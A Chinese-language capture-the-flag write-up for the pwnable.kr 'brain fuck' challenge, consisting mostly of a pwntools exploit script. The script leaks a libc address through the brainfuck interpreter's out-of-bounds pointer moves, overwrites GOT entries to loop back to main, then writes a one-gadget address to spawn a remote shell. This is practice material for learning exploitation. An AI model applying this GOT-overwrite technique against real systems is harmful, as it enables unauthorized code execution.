pwnable.kr 之 brain fuck

brain fuck，类似vm吧，可以进行读写，移位，加减操作。

所以移位操作和读写操作结合起来其实就是任意地址写，且got表可写。

思路：

先通任意地址读，读取got表上的libc地址，然后通过任意地址写将putchar@got修改为main，返回到main函数。

第二次输入的时候修改putchar@got为onegadget即可

#coding:utf-8

# from libformatstr import FormatStr
# py64 = FormatStr(isx64=1) 
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))
from pwn import *
import sys

local = 0
context.terminal=['tmux','splitw','-h']
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./bf')
    elf = ELF('./bf')
    libc = elf.libc
    # p = process(argv=['',pay])
    # p = process(["/lib/ld-linux.so.2","./bf"],env={"LD_PRELOAD":"./bf_libc.so"})
else:
    p = remote("pwnable.kr","9001")
    elf = ELF('./bf')
    libc = ELF('./bf_libc.so')

#内存地址随机化
def debug(addr=0,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        print "breakpoint_addr --> " + hex(text_base + 0x202040)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr))) 

sd = lambda s    :p.send(s)
rc = lambda s    :p.recv(s)
sl = lambda s    :p.sendline(s)
ru = lambda s    :p.recvuntil(s)
sda = lambda a,s :p.sendafter(a,s)
sla = lambda a,s :p.sendlineafter(a,s)

def leak(name,addr):
    log.info(name + " --> %s",hex(addr))

binsh = 0x804a0a0
pay = ''
pay += ',>'*8 #getchar
pay += '<'*8
pay += '<'*0x78
pay += '.>'*4 #putchar
pay += '>'*4
pay += ',>'*4 #getchar
pay += '.'
#gdb.attach(p,"b *0x08048774")
sla("[ ]\n",pay)
pause()
sd("/bin/sh\x00")
pause()
sd(p32(0x08048671))

#one = [0x3ac6c,0x3ac6e,0x3ac72,0x3ac79,0x5fbd5,0x5fbd6] #local
one = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6,] #remote
setvbuf = u32(rc(4))
libc_base = setvbuf - libc.sym['setvbuf']
onegadget = libc_base + one[4]
system = libc_base + libc.sym['system']
leak("libc_base",libc_base)
#leak("memset",memset)
#leak("system",system)
leak("onegadget",onegadget)

pay = ''
pay += '<'*0x70
pay += ',>'*4
pay += '.'
#gdb.attach(p,"b *0x08048648")
sla("[ ]\n",pay)
pause()
sl(p32(onegadget))
p.interactive()